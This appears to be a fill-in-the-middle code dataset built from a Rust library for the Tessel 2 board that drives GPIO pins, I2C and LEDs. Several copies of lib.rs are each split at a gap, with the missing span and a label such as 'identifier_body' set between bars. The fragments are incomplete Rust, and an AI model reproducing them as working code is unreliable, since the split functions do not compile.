pub fn i2c(&self, frequency: u32) -> Result<I2C, TryLockError<MutexGuard<()>>> {
let scl = try!(self.pin(0));
let sda = try!(self.pin(1));
Ok(I2C::new(self.socket.clone(), scl, sda, frequency))
}
}
pub struct I2C<'p> {
socket: Arc<Mutex<PortSocket>>,
_scl: Pin<'p>,
_sda: Pin<'p>,
pub frequency: u32,
}
impl<'p> I2C<'p> {
// TODO: make frequency optional
fn new<'a>(socket: Arc<Mutex<PortSocket>>, scl: Pin<'a>, sda: Pin<'a>, frequency: u32) -> I2C<'a> {
let baud: u8 = I2C::compute_baud(frequency);
let mut i2c = I2C {
socket: socket,
_scl: scl,
_sda: sda,
frequency: frequency,
};
i2c.enable(baud);
i2c
}
/// Computes the baudrate as used on the Atmel SAMD21 I2C register
/// to set the frequency of the I2C Clock.
fn compute_baud(frequency: u32) -> u8 {
let mut intermediate: f64 = MCU_MAX_SPEED as f64 / frequency as f64;
intermediate = intermediate - MCU_MAX_SPEED as f64 * MCU_MAX_SCL_RISE_TIME_NS;
// TODO: Do not hardcode these numbers
intermediate = intermediate / MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD as f64 -
MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD as f64;
// Return either the intermediate value or 255
let low = intermediate.min(u8::max_value() as f64);
// If we have a potentially negative register value
// Casting as i64 because .float does not seem to work
if (low as i64) < u8::min_value() as i64 {
// Use 0 instead
return u8::min_value();
} else {
// Return the new register value
return low as u8;
}
}
fn enable(&mut self, baud: u8) {
let mut sock = self.socket.lock().unwrap();
sock.write_command(Command::EnableI2C{ baud: baud }).unwrap();
}
fn tx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, write_buf: &[u8]) {
sock.write_command(Command::Start(address<<1)).unwrap();
// Write the command and data
sock.write_command(Command::Tx(write_buf)).unwrap();
}
fn rx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, read_buf: &mut [u8]) {
sock.write_command(Command::Start(address << 1 | 1)).unwrap();
// Write the command and transfer length
sock.write_command(Command::Rx(read_buf.len() as u8)).unwrap();
}
fn stop(&self, sock: &mut MutexGuard<PortSocket>) {
// Tell I2C to send STOP condition
sock.write_command(Command::Stop).unwrap();
}
pub fn send(&mut self, address: u8, write_buf: &[u8]) {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.stop(&mut sock);
}
pub fn read(&mut self, address: u8, read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
pub fn transfer(&mut self, address: u8, write_buf: &[u8], read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
}
// TODO: Figure out how to override the path secretly so the example
// can actually be run.
/// A LED models an LED on the Tessel board.
/// # Example
/// ```rust,no_run
/// use tessel::LED;
///
/// let mut led = LED::new("red", "error");
/// // LEDs are off by default.
/// assert_eq!(false, led.read());
/// led.on().unwrap();
/// assert_eq!(true, led.read());
pub struct LED {
// The file object we write to in order to change state.
file: File,
// The current value of the LED, defaults to false.
value: bool,
}
impl LED {
pub fn new(color: &'static str, kind: &'static str) -> LED {
let path = format!("/sys/devices/leds/leds/tessel:{}:{}/brightness",
color,
kind);
// Open the file for write operations.
LED::new_with_file(File::create(path).unwrap())
}
fn new_with_file(file: File) -> LED {
let mut led = LED {
value: false,
file: file,
};
// Turn the LED off by default.
led.off().unwrap();
led
}
// Turn the LED on (same as `high`).
pub fn on(&mut self) -> Result<(), io::Error> {
self.high()
}
// Turn the LED off (same as `low`).
pub fn off(&mut self) -> Result<(), io::Error> {
self.low()
}
// Turn the LED on.
pub fn high(&mut self) -> Result<(), io::Error> {
self.write(true)
}
// Turn the LED off.
pub fn low(&mut self) -> Result<(), io::Error> {
self.write(false)
}
// Sets the LED to the opposite of its current state.
pub fn toggle(&mut self) -> Result<(), io::Error> {
let new_value = !self.value;
self.write(new_value)
}
// Returns the current state of the LED.
pub fn read(&self) -> bool {
self.value
}
// Helper function to write new state to LED filepath.
fn write(&mut self, new_value: bool) -> Result<(), io::Error> {
// Save the new value to the model.
self.value = new_value;
// Return the binary representation of that value type.
let string_value = match new_value {
true => b'1',
false => b'0',
};
// Write that data to the file and return the result.
self.file.write_all(&[string_value])
}
}
#[cfg(test)]
mod tests {
extern crate tempfile;
use super::*;
use std::io::{Read, Seek, SeekFrom};
#[test]
fn led_writes_to_file() {
let mut tmpfile = tempfile::tempfile().unwrap();
// The tmpfile handle can be reused as long as LED gets its own
// clone of the handle, and we are diligent about seeking.
// This avoids needing to figure out where the tmpfile is in order
// to open more handles.
let mut led = LED::new_with_file(tmpfile.try_clone().unwrap());
let mut buf = String::new();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
assert_eq!("0", buf);
led.on().unwrap();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
// b'1' is written as 001 into the file.
assert_eq!("001", buf);
}
}
| {
sock.write_command(Command::GpioHigh(self.index as u8))
} | conditional_block |
lib.rs | extern crate unix_socket;
pub mod protocol;
use protocol::{Command, reply, PortSocket};
use std::collections::HashMap;
use std::fs::File;
use std::io;
use std::io::prelude::*;
use std::sync::Arc;
use std::sync::{Mutex, MutexGuard, TryLockError};
use std::u8;
// TODO Corking reduces latency, as spid adds overhead for each packet
// Paths to the SPI daemon sockets with incoming data from coprocessor.
const PORT_A_UDS_PATH: &'static str = "/var/run/tessel/port_a";
const PORT_B_UDS_PATH: &'static str = "/var/run/tessel/port_b";
const MCU_MAX_SPEED: u32 = 48e6 as u32;
// TODO: Replace with better name
const MCU_MAX_SCL_RISE_TIME_NS: f64 = 1.5e-8 as f64;
const MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD: u8 = 2;
const MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD: u8 = 5;
/// Primary exported Tessel object with access to module ports, LEDs, and a button.
/// # Example
/// ```
/// use tessel::Tessel;
///
/// # #[allow(dead_code)]
/// # fn example() {
/// let t = Tessel::new();
/// // Tessel 2 has four LEDs available.
/// assert_eq!(t.led.len(), 4);
/// // Tessel 2 has two ports labelled a and b
/// let a = t.port.a;
/// let b = t.port.b;
/// # }
/// ```
pub struct Tessel {
// A group of module ports.
pub port: PortGroup,
// An array of LED structs.
pub led: Vec<LED>,
}
impl Tessel {
// new() returns a Tessel struct conforming to the Tessel 2's functionality.
pub fn new() -> Tessel {
// Create a port group with two ports, one on each domain socket path.
let ports = PortGroup {
a: Port::new(PORT_A_UDS_PATH),
b: Port::new(PORT_B_UDS_PATH),
};
// Create models for the four LEDs.
let red_led = LED::new("red", "error");
let amber_led = LED::new("amber", "wlan");
let green_led = LED::new("green", "user1");
let blue_led = LED::new("blue", "user2");
// Return the Tessel with these fields.
Tessel {
port: ports,
led: vec![red_led, amber_led, green_led, blue_led],
}
}
}
/// A PortGroup is a simple way to access each port through its letter identifier.
#[allow(dead_code)]
pub struct PortGroup {
pub a: Port,
pub b: Port,
}
/// A Port is a model of the Tessel hardware ports.
/// # Example
/// ```
/// use tessel::Port;
/// ```
pub struct Port {
// Path of the domain socket.
socket: Arc<Mutex<PortSocket>>,
pins: HashMap<usize, Mutex<()>>,
}
pub struct Pin<'a> {
index: usize,
_guard: MutexGuard<'a, ()>,
socket: Arc<Mutex<PortSocket>>,
}
impl<'a> Pin<'a> {
pub fn output(&mut self, value: bool) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
if value {
sock.write_command(Command::GpioHigh(self.index as u8))
} else {
sock.write_command(Command::GpioLow(self.index as u8))
}
}
}
impl Port {
pub fn new(path: &str) -> Port {
let mut pins = HashMap::new();
for i in 0..8 {
pins.insert(i, Mutex::new(()));
}
// Create and return the port struct
Port {
socket: Arc::new(Mutex::new(PortSocket::new(path))),
pins: pins,
}
}
pub fn pin(&self, index: usize) -> Result<Pin, TryLockError<MutexGuard<()>>> {
Ok(Pin {
index: index,
_guard: try!(self.pins.get(&index).expect("TODO dont panic on pin fetch").lock()),
socket: self.socket.clone(),
})
}
pub fn i2c(&self, frequency: u32) -> Result<I2C, TryLockError<MutexGuard<()>>> {
let scl = try!(self.pin(0));
let sda = try!(self.pin(1));
Ok(I2C::new(self.socket.clone(), scl, sda, frequency))
}
}
pub struct I2C<'p> {
socket: Arc<Mutex<PortSocket>>,
_scl: Pin<'p>,
_sda: Pin<'p>,
pub frequency: u32,
}
impl<'p> I2C<'p> {
// TODO: make frequency optional
fn new<'a>(socket: Arc<Mutex<PortSocket>>, scl: Pin<'a>, sda: Pin<'a>, frequency: u32) -> I2C<'a> {
let baud: u8 = I2C::compute_baud(frequency);
let mut i2c = I2C {
socket: socket,
_scl: scl,
_sda: sda,
frequency: frequency,
};
i2c.enable(baud);
i2c
}
/// Computes the baudrate as used on the Atmel SAMD21 I2C register
/// to set the frequency of the I2C Clock.
fn compute_baud(frequency: u32) -> u8 {
let mut intermediate: f64 = MCU_MAX_SPEED as f64 / frequency as f64;
intermediate = intermediate - MCU_MAX_SPEED as f64 * MCU_MAX_SCL_RISE_TIME_NS;
// TODO: Do not hardcode these numbers
intermediate = intermediate / MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD as f64 -
MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD as f64;
// Return either the intermediate value or 255
let low = intermediate.min(u8::max_value() as f64);
// If we have a potentially negative register value
// Casting as i64 because .float does not seem to work
if (low as i64) < u8::min_value() as i64 {
// Use 0 instead
return u8::min_value();
} else {
// Return the new register value
return low as u8;
}
}
fn enable(&mut self, baud: u8) |
fn tx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, write_buf: &[u8]) {
sock.write_command(Command::Start(address<<1)).unwrap();
// Write the command and data
sock.write_command(Command::Tx(write_buf)).unwrap();
}
fn rx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, read_buf: &mut [u8]) {
sock.write_command(Command::Start(address << 1 | 1)).unwrap();
// Write the command and transfer length
sock.write_command(Command::Rx(read_buf.len() as u8)).unwrap();
}
fn stop(&self, sock: &mut MutexGuard<PortSocket>) {
// Tell I2C to send STOP condition
sock.write_command(Command::Stop).unwrap();
}
pub fn send(&mut self, address: u8, write_buf: &[u8]) {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.stop(&mut sock);
}
pub fn read(&mut self, address: u8, read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
pub fn transfer(&mut self, address: u8, write_buf: &[u8], read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
}
// TODO: Figure out how to override the path secretly so the example
// can actually be run.
/// A LED models an LED on the Tessel board.
/// # Example
/// ```rust,no_run
/// use tessel::LED;
///
/// let mut led = LED::new("red", "error");
/// // LEDs are off by default.
/// assert_eq!(false, led.read());
/// led.on().unwrap();
/// assert_eq!(true, led.read());
pub struct LED {
// The file object we write to in order to change state.
file: File,
// The current value of the LED, defaults to false.
value: bool,
}
impl LED {
pub fn new(color: &'static str, kind: &'static str) -> LED {
let path = format!("/sys/devices/leds/leds/tessel:{}:{}/brightness",
color,
kind);
// Open the file for write operations.
LED::new_with_file(File::create(path).unwrap())
}
fn new_with_file(file: File) -> LED {
let mut led = LED {
value: false,
file: file,
};
// Turn the LED off by default.
led.off().unwrap();
led
}
// Turn the LED on (same as `high`).
pub fn on(&mut self) -> Result<(), io::Error> {
self.high()
}
// Turn the LED off (same as `low`).
pub fn off(&mut self) -> Result<(), io::Error> {
self.low()
}
// Turn the LED on.
pub fn high(&mut self) -> Result<(), io::Error> {
self.write(true)
}
// Turn the LED off.
pub fn low(&mut self) -> Result<(), io::Error> {
self.write(false)
}
// Sets the LED to the opposite of its current state.
pub fn toggle(&mut self) -> Result<(), io::Error> {
let new_value = !self.value;
self.write(new_value)
}
// Returns the current state of the LED.
pub fn read(&self) -> bool {
self.value
}
// Helper function to write new state to LED filepath.
fn write(&mut self, new_value: bool) -> Result<(), io::Error> {
// Save the new value to the model.
self.value = new_value;
// Return the binary representation of that value type.
let string_value = match new_value {
true => b'1',
false => b'0',
};
// Write that data to the file and return the result.
self.file.write_all(&[string_value])
}
}
#[cfg(test)]
mod tests {
extern crate tempfile;
use super::*;
use std::io::{Read, Seek, SeekFrom};
#[test]
fn led_writes_to_file() {
let mut tmpfile = tempfile::tempfile().unwrap();
// The tmpfile handle can be reused as long as LED gets its own
// clone of the handle, and we are diligent about seeking.
// This avoids needing to figure out where the tmpfile is in order
// to open more handles.
let mut led = LED::new_with_file(tmpfile.try_clone().unwrap());
let mut buf = String::new();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
assert_eq!("0", buf);
led.on().unwrap();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
// b'1' is written as 001 into the file.
assert_eq!("001", buf);
}
}
| {
let mut sock = self.socket.lock().unwrap();
sock.write_command(Command::EnableI2C{ baud: baud }).unwrap();
} | identifier_body |
lib.rs | extern crate unix_socket;
pub mod protocol;
use protocol::{Command, reply, PortSocket};
use std::collections::HashMap;
use std::fs::File;
use std::io;
use std::io::prelude::*;
use std::sync::Arc;
use std::sync::{Mutex, MutexGuard, TryLockError};
use std::u8;
// TODO Corking reduces latency, as spid adds overhead for each packet
// Paths to the SPI daemon sockets with incoming data from coprocessor.
const PORT_A_UDS_PATH: &'static str = "/var/run/tessel/port_a";
const PORT_B_UDS_PATH: &'static str = "/var/run/tessel/port_b";
const MCU_MAX_SPEED: u32 = 48e6 as u32;
// TODO: Replace with better name
const MCU_MAX_SCL_RISE_TIME_NS: f64 = 1.5e-8 as f64;
const MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD: u8 = 2;
const MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD: u8 = 5;
/// Primary exported Tessel object with access to module ports, LEDs, and a button.
/// # Example
/// ```
/// use tessel::Tessel;
///
/// # #[allow(dead_code)]
/// # fn example() {
/// let t = Tessel::new();
/// // Tessel 2 has four LEDs available.
/// assert_eq!(t.led.len(), 4);
/// // Tessel 2 has two ports labelled a and b
/// let a = t.port.a;
/// let b = t.port.b;
/// # }
/// ```
pub struct Tessel {
// A group of module ports.
pub port: PortGroup,
// An array of LED structs.
pub led: Vec<LED>,
}
impl Tessel {
// new() returns a Tessel struct conforming to the Tessel 2's functionality.
pub fn new() -> Tessel {
// Create a port group with two ports, one on each domain socket path.
let ports = PortGroup {
a: Port::new(PORT_A_UDS_PATH),
b: Port::new(PORT_B_UDS_PATH),
};
// Create models for the four LEDs.
let red_led = LED::new("red", "error");
let amber_led = LED::new("amber", "wlan");
let green_led = LED::new("green", "user1");
let blue_led = LED::new("blue", "user2");
// Return the Tessel with these fields.
Tessel {
port: ports,
led: vec![red_led, amber_led, green_led, blue_led],
}
}
}
/// A PortGroup is a simple way to access each port through its letter identifier.
#[allow(dead_code)]
pub struct PortGroup {
pub a: Port,
pub b: Port,
}
/// A Port is a model of the Tessel hardware ports.
/// # Example
/// ```
/// use tessel::Port;
/// ```
pub struct Port {
// Path of the domain socket.
socket: Arc<Mutex<PortSocket>>,
pins: HashMap<usize, Mutex<()>>,
}
pub struct Pin<'a> {
index: usize,
_guard: MutexGuard<'a, ()>,
socket: Arc<Mutex<PortSocket>>,
}
impl<'a> Pin<'a> {
pub fn output(&mut self, value: bool) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
if value {
sock.write_command(Command::GpioHigh(self.index as u8))
} else {
sock.write_command(Command::GpioLow(self.index as u8))
}
}
}
impl Port {
pub fn new(path: &str) -> Port {
let mut pins = HashMap::new();
for i in 0..8 {
pins.insert(i, Mutex::new(()));
}
// Create and return the port struct
Port {
socket: Arc::new(Mutex::new(PortSocket::new(path))),
pins: pins,
}
}
pub fn pin(&self, index: usize) -> Result<Pin, TryLockError<MutexGuard<()>>> {
Ok(Pin {
index: index,
_guard: try!(self.pins.get(&index).expect("TODO dont panic on pin fetch").lock()),
socket: self.socket.clone(),
})
}
pub fn i2c(&self, frequency: u32) -> Result<I2C, TryLockError<MutexGuard<()>>> {
let scl = try!(self.pin(0));
let sda = try!(self.pin(1));
Ok(I2C::new(self.socket.clone(), scl, sda, frequency))
}
}
pub struct I2C<'p> {
socket: Arc<Mutex<PortSocket>>,
_scl: Pin<'p>,
_sda: Pin<'p>,
pub frequency: u32,
}
impl<'p> I2C<'p> {
// TODO: make frequency optional
fn new<'a>(socket: Arc<Mutex<PortSocket>>, scl: Pin<'a>, sda: Pin<'a>, frequency: u32) -> I2C<'a> {
let baud: u8 = I2C::compute_baud(frequency);
let mut i2c = I2C {
socket: socket,
_scl: scl,
_sda: sda,
frequency: frequency,
};
i2c.enable(baud);
i2c
}
/// Computes the baudrate as used on the Atmel SAMD21 I2C register
/// to set the frequency of the I2C Clock.
fn compute_baud(frequency: u32) -> u8 {
let mut intermediate: f64 = MCU_MAX_SPEED as f64 / frequency as f64;
intermediate = intermediate - MCU_MAX_SPEED as f64 * MCU_MAX_SCL_RISE_TIME_NS;
// TODO: Do not hardcode these numbers
intermediate = intermediate / MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD as f64 -
MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD as f64;
// Return either the intermediate value or 255
let low = intermediate.min(u8::max_value() as f64);
// If we have a potentially negative register value
// Casting as i64 because .float does not seem to work
if (low as i64) < u8::min_value() as i64 {
// Use 0 instead
return u8::min_value();
} else {
// Return the new register value
return low as u8;
}
}
fn enable(&mut self, baud: u8) {
let mut sock = self.socket.lock().unwrap();
sock.write_command(Command::EnableI2C{ baud: baud }).unwrap();
}
fn tx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, write_buf: &[u8]) {
sock.write_command(Command::Start(address<<1)).unwrap();
// Write the command and data
sock.write_command(Command::Tx(write_buf)).unwrap();
}
fn rx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, read_buf: &mut [u8]) {
sock.write_command(Command::Start(address << 1 | 1)).unwrap();
// Write the command and transfer length
sock.write_command(Command::Rx(read_buf.len() as u8)).unwrap();
}
fn stop(&self, sock: &mut MutexGuard<PortSocket>) {
// Tell I2C to send STOP condition
sock.write_command(Command::Stop).unwrap();
}
pub fn send(&mut self, address: u8, write_buf: &[u8]) {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.stop(&mut sock);
}
pub fn read(&mut self, address: u8, read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
pub fn transfer(&mut self, address: u8, write_buf: &[u8], read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
}
// TODO: Figure out how to override the path secretly so the example
// can actually be run.
/// A LED models an LED on the Tessel board.
/// # Example
/// ```rust,no_run
/// use tessel::LED;
///
/// let mut led = LED::new("red", "error");
/// // LEDs are off by default.
/// assert_eq!(false, led.read());
/// led.on().unwrap();
/// assert_eq!(true, led.read());
pub struct LED {
// The file object we write to in order to change state.
file: File,
// The current value of the LED, defaults to false.
value: bool,
}
impl LED {
pub fn new(color: &'static str, kind: &'static str) -> LED {
let path = format!("/sys/devices/leds/leds/tessel:{}:{}/brightness",
color,
kind);
// Open the file for write operations.
LED::new_with_file(File::create(path).unwrap())
}
fn new_with_file(file: File) -> LED {
let mut led = LED {
value: false,
file: file,
};
// Turn the LED off by default.
led.off().unwrap();
led
}
// Turn the LED on (same as `high`).
pub fn on(&mut self) -> Result<(), io::Error> {
self.high()
}
// Turn the LED off (same as `low`).
pub fn off(&mut self) -> Result<(), io::Error> {
self.low()
}
// Turn the LED on.
pub fn high(&mut self) -> Result<(), io::Error> {
self.write(true)
}
// Turn the LED off.
pub fn low(&mut self) -> Result<(), io::Error> {
self.write(false)
}
// Sets the LED to the opposite of its current state.
pub fn | (&mut self) -> Result<(), io::Error> {
let new_value = !self.value;
self.write(new_value)
}
// Returns the current state of the LED.
pub fn read(&self) -> bool {
self.value
}
// Helper function to write new state to LED filepath.
fn write(&mut self, new_value: bool) -> Result<(), io::Error> {
// Save the new value to the model.
self.value = new_value;
// Return the binary representation of that value type.
let string_value = match new_value {
true => b'1',
false => b'0',
};
// Write that data to the file and return the result.
self.file.write_all(&[string_value])
}
}
#[cfg(test)]
mod tests {
extern crate tempfile;
use super::*;
use std::io::{Read, Seek, SeekFrom};
#[test]
fn led_writes_to_file() {
let mut tmpfile = tempfile::tempfile().unwrap();
// The tmpfile handle can be reused as long as LED gets its own
// clone of the handle, and we are diligent about seeking.
// This avoids needing to figure out where the tmpfile is in order
// to open more handles.
let mut led = LED::new_with_file(tmpfile.try_clone().unwrap());
let mut buf = String::new();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
assert_eq!("0", buf);
led.on().unwrap();
tmpfile.seek(SeekFrom::Start(0)).unwrap();
tmpfile.read_to_string(&mut buf).unwrap();
// b'1' is written as 001 into the file.
assert_eq!("001", buf);
}
}
| toggle | identifier_name |
lib.rs | extern crate unix_socket;
pub mod protocol;
use protocol::{Command, reply, PortSocket};
use std::collections::HashMap;
use std::fs::File;
use std::io;
use std::io::prelude::*;
use std::sync::Arc;
use std::sync::{Mutex, MutexGuard, TryLockError};
use std::u8;
// TODO Corking reduces latency, as spid adds overhead for each packet
// Paths to the SPI daemon sockets with incoming data from coprocessor.
const PORT_A_UDS_PATH: &'static str = "/var/run/tessel/port_a";
const PORT_B_UDS_PATH: &'static str = "/var/run/tessel/port_b";
const MCU_MAX_SPEED: u32 = 48e6 as u32;
// TODO: Replace with better name
const MCU_MAX_SCL_RISE_TIME_NS: f64 = 1.5e-8 as f64;
const MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD: u8 = 2;
const MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD: u8 = 5;
/// Primary exported Tessel object with access to module ports, LEDs, and a button.
/// # Example
/// ```
/// use tessel::Tessel;
///
/// # #[allow(dead_code)]
/// # fn example() {
/// let t = Tessel::new();
/// // Tessel 2 has four LEDs available.
/// assert_eq!(t.led.len(), 4);
/// // Tessel 2 has two ports labelled a and b
/// let a = t.port.a;
/// let b = t.port.b;
/// # }
/// ``` | pub port: PortGroup,
// An array of LED structs.
pub led: Vec<LED>,
}
impl Tessel {
// new() returns a Tessel struct conforming to the Tessel 2's functionality.
pub fn new() -> Tessel {
// Create a port group with two ports, one on each domain socket path.
let ports = PortGroup {
a: Port::new(PORT_A_UDS_PATH),
b: Port::new(PORT_B_UDS_PATH),
};
// Create models for the four LEDs.
let red_led = LED::new("red", "error");
let amber_led = LED::new("amber", "wlan");
let green_led = LED::new("green", "user1");
let blue_led = LED::new("blue", "user2");
// Return the Tessel with these fields.
Tessel {
port: ports,
led: vec![red_led, amber_led, green_led, blue_led],
}
}
}
/// A PortGroup is a simple way to access each port through its letter identifier.
#[allow(dead_code)]
pub struct PortGroup {
pub a: Port,
pub b: Port,
}
/// A Port is a model of the Tessel hardware ports.
/// # Example
/// ```
/// use tessel::Port;
/// ```
pub struct Port {
// Path of the domain socket.
socket: Arc<Mutex<PortSocket>>,
pins: HashMap<usize, Mutex<()>>,
}
pub struct Pin<'a> {
index: usize,
_guard: MutexGuard<'a, ()>,
socket: Arc<Mutex<PortSocket>>,
}
impl<'a> Pin<'a> {
pub fn output(&mut self, value: bool) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
if value {
sock.write_command(Command::GpioHigh(self.index as u8))
} else {
sock.write_command(Command::GpioLow(self.index as u8))
}
}
}
impl Port {
pub fn new(path: &str) -> Port {
let mut pins = HashMap::new();
for i in 0..8 {
pins.insert(i, Mutex::new(()));
}
// Create and return the port struct
Port {
socket: Arc::new(Mutex::new(PortSocket::new(path))),
pins: pins,
}
}
pub fn pin(&self, index: usize) -> Result<Pin, TryLockError<MutexGuard<()>>> {
Ok(Pin {
index: index,
_guard: try!(self.pins.get(&index).expect("TODO dont panic on pin fetch").lock()),
socket: self.socket.clone(),
})
}
pub fn i2c(&self, frequency: u32) -> Result<I2C, TryLockError<MutexGuard<()>>> {
let scl = try!(self.pin(0));
let sda = try!(self.pin(1));
Ok(I2C::new(self.socket.clone(), scl, sda, frequency))
}
}
pub struct I2C<'p> {
socket: Arc<Mutex<PortSocket>>,
_scl: Pin<'p>,
_sda: Pin<'p>,
pub frequency: u32,
}
impl<'p> I2C<'p> {
// TODO: make frequency optional
fn new<'a>(socket: Arc<Mutex<PortSocket>>, scl: Pin<'a>, sda: Pin<'a>, frequency: u32) -> I2C<'a> {
let baud: u8 = I2C::compute_baud(frequency);
let mut i2c = I2C {
socket: socket,
_scl: scl,
_sda: sda,
frequency: frequency,
};
i2c.enable(baud);
i2c
}
/// Computes the baudrate as used on the Atmel SAMD21 I2C register
/// to set the frequency of the I2C Clock.
fn compute_baud(frequency: u32) -> u8 {
let mut intermediate: f64 = MCU_MAX_SPEED as f64 / frequency as f64;
intermediate = intermediate - MCU_MAX_SPEED as f64 * MCU_MAX_SCL_RISE_TIME_NS;
// TODO: Do not hardcode these numbers
intermediate = intermediate / MCU_MAGIC_DIV_FACTOR_FOR_I2C_BAUD as f64 -
MCU_MAGIC_SUBTRACT_FACTOR_FOR_I2C_BAUD as f64;
// Return either the intermediate value or 255
let low = intermediate.min(u8::max_value() as f64);
// If we have a potentially negative register value
// Casting as i64 because .float does not seem to work
if (low as i64) < u8::min_value() as i64 {
// Use 0 instead
return u8::min_value();
} else {
// Return the new register value
return low as u8;
}
}
fn enable(&mut self, baud: u8) {
let mut sock = self.socket.lock().unwrap();
sock.write_command(Command::EnableI2C{ baud: baud }).unwrap();
}
fn tx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, write_buf: &[u8]) {
sock.write_command(Command::Start(address<<1)).unwrap();
// Write the command and data
sock.write_command(Command::Tx(write_buf)).unwrap();
}
fn rx(&self, sock: &mut MutexGuard<PortSocket>, address: u8, read_buf: &mut [u8]) {
sock.write_command(Command::Start(address << 1 | 1)).unwrap();
// Write the command and transfer length
sock.write_command(Command::Rx(read_buf.len() as u8)).unwrap();
}
fn stop(&self, sock: &mut MutexGuard<PortSocket>) {
// Tell I2C to send STOP condition
sock.write_command(Command::Stop).unwrap();
}
pub fn send(&mut self, address: u8, write_buf: &[u8]) {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.stop(&mut sock);
}
pub fn read(&mut self, address: u8, read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
pub fn transfer(&mut self, address: u8, write_buf: &[u8], read_buf: &mut [u8]) -> io::Result<()> {
let mut sock = self.socket.lock().unwrap();
self.tx(&mut sock, address, write_buf);
self.rx(&mut sock, address, read_buf);
self.stop(&mut sock);
// TODO: this is not how async reads should be handled.
// Read in first byte.
let mut read_byte = [0];
try!(sock.read_exact(&mut read_byte));
assert_eq!(read_byte[0], reply::DATA.0);
// Read in data from the socket
return sock.read_exact(read_buf);
}
}
// TODO: Figure out how to override the path secretly so the example
// can actually be run.
/// A LED models an LED on the Tessel board.
/// # Example
/// ```rust,no_run
/// use tessel::LED;
///
/// let mut led = LED::new("red", "error");
/// // LEDs are off by default.
/// assert_eq!(false, led.read());
/// led.on().unwrap();
/// assert_eq!(true, led.read());
pub struct LED {
// The file object we write to in order to change state.
file: File,
// The current value of the LED, defaults to false.
value: bool,
}
impl LED {
pub fn new(color: &'static str, kind: &'static str) -> LED {
let path = format!("/sys/devices/leds/leds/tessel:{}:{}/brightness",
color,
kind);
// Open the file for write operations.
